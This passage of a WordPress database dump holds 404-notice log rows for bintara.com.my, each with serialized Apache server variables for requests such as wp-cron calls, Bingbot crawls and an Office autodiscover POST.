VER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZSEw5E1j0Gd0d0ESIzhwAAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570015309.4516\";s:12:\"REQUEST_TIME\";s:10:\"1570015309\";}}','notice','2019-10-02 11:22:07','2019-10-02 11:21:53',35673168,35925616,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570014403.2615458965301513671875',1,0,'103.6.198.69'),(27442,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/wp-content/uploads/2018/12/content-post.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/uploads/2018/12/content-post.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZTGSJE1j0Gd0d0ESIwG5QAAAQI\";s:19:\"REDIRECT_SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/wp-content/uploads/2018/12/content-post.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZTGSJE1j0Gd0d0ESIwG5QAAAQI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"64.71.32.85\";s:11:\"REMOTE_PORT\";s:5:\"44716\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:66:\"https://bintara.com.my/wp-content/uploads/2018/12/content-post.php\";s:10:\"SCRIPT_URL\";s:44:\"/wp-content/uploads/2018/12/content-post.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZTGSJE1j0Gd0d0ESIwG5QAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570031176.1858\";s:12:\"REQUEST_TIME\";s:10:\"1570031176\";}}','notice','2019-10-02 15:46:19','2019-10-02 15:46:16',35642904,37441520,'https://bintara.com.my/wp-content/uploads/2018/12/content-post.php',1,0,'64.71.32.85'),(27344,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569841696.7497560977935791015625\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569841696.7497560977935791015625\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569841696.7497560977935791015625\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569841696.7497560977935791015625\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"55766\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569841696.7497560977935791015625\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZHiIIJA@BHzIZKM8@MlbwAAAQo\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZHiIIJA@BHzIZKM8@MlbwAAAQo\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"55766\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZHiIIJA@BHzIZKM8@MlbwAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569842612.5546\";s:12:\"REQUEST_TIME\";s:10:\"1569842612\";}}','notice','2019-09-30 11:23:53','2019-09-30 11:23:36',35215888,35468496,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569841696.7497560977935791015625',1,0,'103.6.198.69'),(27346,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/teamviewer-2/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZIKKYJA@BHzIZKM8@MsQgAAAQ4\";s:12:\"REDIRECT_URL\";s:14:\"/teamviewer-2/\";s:11:\"REMOTE_ADDR\";s:12:\"157.55.39.95\";s:11:\"REMOTE_PORT\";s:4:\"1545\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/teamviewer-2/\";s:10:\"SCRIPT_URL\";s:14:\"/teamviewer-2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZIKKYJA@BHzIZKM8@MsQgAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569851945.8704\";s:12:\"REQUEST_TIME\";s:10:\"1569851945\";}}','notice','2019-09-30 13:59:08','2019-09-30 13:59:06',34050160,35859800,'https://bintara.com.my/teamviewer-2/',1,0,'157.55.39.95'),(27536,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570273717.1844890117645263671875\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570273717.1844890117645263671875\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570273717.1844890117645263671875\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570273717.1844890117645263671875\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"47402\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570273717.1844890117645263671875\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZh5tUGaeXEybixQimRciwAAANM\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZh5tUGaeXEybixQimRciwAAANM\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"47402\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZh5tUGaeXEybixQimRciwAAANM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570274620.7624\";s:12:\"REQUEST_TIME\";s:10:\"1570274620\";}}','notice','2019-10-05 11:24:03','2019-10-05 11:23:44',35067160,35319560,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570273717.1844890117645263671875',1,0,'103.6.198.69'),(28025,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"45B599A5-4068-493D-BEA7-A0E2B4553C91\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaRL-WfO-tVFZ234mVg4vAAAAA4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.142.119.93\";s:11:\"REMOTE_PORT\";s:5:\"55414\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaRL-WfO-tVFZ234mVg4vAAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571048446.0461\";s:12:\"REQUEST_TIME\";s:10:\"1571048446\";}}','notice','2019-10-14 10:20:49','2019-10-14 10:20:46',35739408,37544896,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.142.119.93'),(28024,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/send-quote-teamviewer/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaRGce64dmMiXPBY9-kOYAAAAIU\";s:12:\"REDIRECT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.174\";s:11:\"REMOTE_PORT\";s:5:\"17111\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/send-quote-teamviewer/\";s:10:\"SCRIPT_URL\";s:23:\"/send-quote-teamviewer/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s